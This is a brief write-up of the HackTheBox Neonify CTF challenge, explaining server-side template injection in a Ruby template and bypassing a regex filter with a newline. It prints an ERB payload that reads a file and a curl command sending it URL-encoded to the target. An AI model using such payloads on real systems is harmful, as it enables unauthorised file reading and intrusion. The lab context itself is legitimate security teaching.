We covered Server Side Template Injection vulnerability and demonstrated a practical scenario using HackTheBox Neonify web challenge. SSTI is a server side exploit in which user input is parsed directly to the template engine without validation. In the example we covered, the code contained a regular expression filter to rule out bad characters so we used a newline character and encoded a payload using URL encoding to reveal the flag contents.. This was part of HackTheBox Neonify.

Get OSCP Certificate Notes

The Complete Penetration Testing with BackBox Course


It’s time for a shiny new reveal for the first-ever text neonifier. Come test out our brand new website and make any text glow like a lo-fi neon tube!

Video Highlights

  • We used this SSTI payload to read and reveal sensitive files
  • <%= File.open('flag.txt').read %
  • The payload should be URL-Encoded with a newline character.

An example request can be sent with curl using the below command to reveal the flag.

curl -d ‘neon=a
%3C%25%3D%20File.open%28%27flag.txt%27%29.read%20%25%3E’ ip:port

Video Walkthrough

About the Author

I create cybersecurity notes, digital marketing notes and online courses. I also provide digital marketing consulting including but not limited to SEO, Google & Meta ads and CRM administration.

View Articles